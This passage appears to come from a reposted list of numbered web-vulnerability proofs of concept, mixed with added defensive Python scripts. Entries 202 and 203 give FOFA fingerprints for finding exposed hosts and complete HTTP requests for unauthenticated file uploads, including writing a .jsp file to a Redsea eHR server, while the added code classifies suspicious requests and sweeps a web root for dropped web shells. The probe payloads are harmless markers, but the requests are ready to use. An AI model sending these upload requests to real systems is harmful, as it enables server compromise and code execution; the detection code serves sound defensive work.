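    "benign": _req("GET", "/index.php?page=2&q=hello+world"),
}


def triage(samples=SAMPLES):
    """Map each sample name to its tag list."""
    return {name: classify(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, tags in triage().items():
        print(f"{name:28} {', '.join(tags) or '-'}")
```

Run it directly to print the tag list per sample; classify() is the call to make per request from a log-parsing loop. A match is a lead, not a verdict: the WAITFOR and SLEEP rules also fire on legitimate administrative tooling that submits SQL, so pair them with the endpoint paths listed in the entries above.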
202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values from the page:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute those values for the __VIEWSTATE and __EVENTVALIDATION placeholders in the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is served from:
/_data/Uploads/1123.txt

203. 红海云 (Redsea) eHR PtFjk file upload
FOFA:body="RedseaPlatform"
The fj_file part is stored with the client-supplied filename; the declared image/jpeg Content-Type is not checked against the .jsp extension.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

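Added example for the upload entries (192, 194, 199, 202, 203), not code from the article or from the products themselves: a Python sweep of a web root that reports files resembling dropped web shells or upload probes. It uses three signals: a server-executable extension inside an upload directory; a script marker (<%, <?php, <?=, #!) at the start of a file in an upload directory regardless of its extension; and, outside upload directories, any file absent from a known-good deployment manifest, which is how the traversal upload in entry 194 (hello.jsp written into fe.war) surfaces. A fourth check looks for the literal probe strings the POCs above print. The directory-name list, extension list and probe strings are my own choices; the demo() layout and file contents are constructed from the paths on this page, and the RedseaPlatform/upload location for entry 203 is an assumption, since that POC does not say where PtFjk stores the file.

```python
"""Sweep a web root for dropped web shells and upload probes, after the
file-upload POCs in entries 192, 194, 199, 202 and 203. Added example, not
code from the reposted article or from any of the listed products. The
directory names, extension list, probe strings and the demo layout are my
own constructions; demo() notes which paths come from the POCs."""
import os
import shutil
import tempfile

EXEC_EXT = {".jsp", ".jspx", ".php", ".phtml", ".phar", ".ashx", ".asmx", ".aspx", ".asp", ".cfm"}
UPLOAD_DIRS = {"upload", "uploads", "attachment", "attachments", "_data", "storage"}
SCRIPT_MARKERS = (b"<%", b"<?php", b"<?=", b"#!")
# Literal strings the POCs above print: cheap IOCs for these exact public POCs.
POC_PROBES = (b'out.println("hello")', b'unlink(__FILE__)',
              b'out.print("hello,eHR")', b'ctx.Response.Write("test")')


def _in_upload_dir(rel_path):
    """True when any parent directory of rel_path is an upload location."""
    return any(p in UPLOAD_DIRS for p in rel_path.lower().split("/")[:-1])


def _head(path, size):
    """First `size` bytes of the file (enough for markers and probe strings)."""
    with open(path, "rb") as fh:
        return fh.read(size)


def scan_webroot(root, baseline=frozenset()):
    """Return sorted (relative_path, reason) findings under root.
    baseline: relative paths of files known to belong to the deployment."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            in_upload = _in_upload_dir(rel)
            if in_upload and ext in EXEC_EXT:
                findings.append((rel, "executable extension in upload dir"))
            if in_upload and _head(full, 4096).lstrip().startswith(SCRIPT_MARKERS):
                findings.append((rel, "script marker in upload dir"))
            if not in_upload and rel not in baseline:
                findings.append((rel, "not in deployment manifest"))
            if any(probe in _head(full, 65536) for probe in POC_PROBES):
                findings.append((rel, "known POC probe string"))
    return sorted(findings)


def demo():
    """Build a throwaway web root from the paths in the POCs and scan it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        # legitimate page, listed in the manifest (constructed)
        "jboss/web/fe.war/index.jsp": b"<%-- legitimate page --%>\n",
        # entry 194: traversal upload lands inside the deployed fe.war
        "jboss/web/fe.war/hello.jsp": b'<% out.println("hello");%>',
        # entry 199: Cockpit assets manager writes under /storage/uploads
        "storage/uploads/tttt.php": b'<?php echo "tttt";unlink(__FILE__);?>',
        # ordinary user upload, must not be flagged (constructed)
        "storage/uploads/report.pdf": b"%PDF-1.4 constructed sample\n",
        # entry 202: plain-text probe under /_data/Uploads
        "_data/Uploads/1123.txt": b"Hello World!",
        # entry 203: PtFjk upload; the storage directory is an assumption
        "RedseaPlatform/upload/11.jsp": b'<% out.print("hello,eHR");%>',
        # entry 192 style: handler source behind an image extension (constructed)
        "JoinfApp/attachments/avatar.jpg": b'<% @ webhandler language="C#" class="AverageHandler" %>',
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    baseline = {"jboss/web/fe.war/index.jsp"}   # assumed deployment manifest
    try:
        return scan_webroot(root, baseline)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:36} {rel}")
```

The 1123.txt probe from entry 202 is deliberately left unflagged: a plain-text file in an upload directory is indistinguishable from user content by inspection, which is why that entry has to be caught at the request level (the upload POST and the later GET of /_data/Uploads/1123.txt) rather than on disk. For a real sweep, generate the baseline from the installer package or a clean deployment, and run the scan against a mounted disk image rather than the live host.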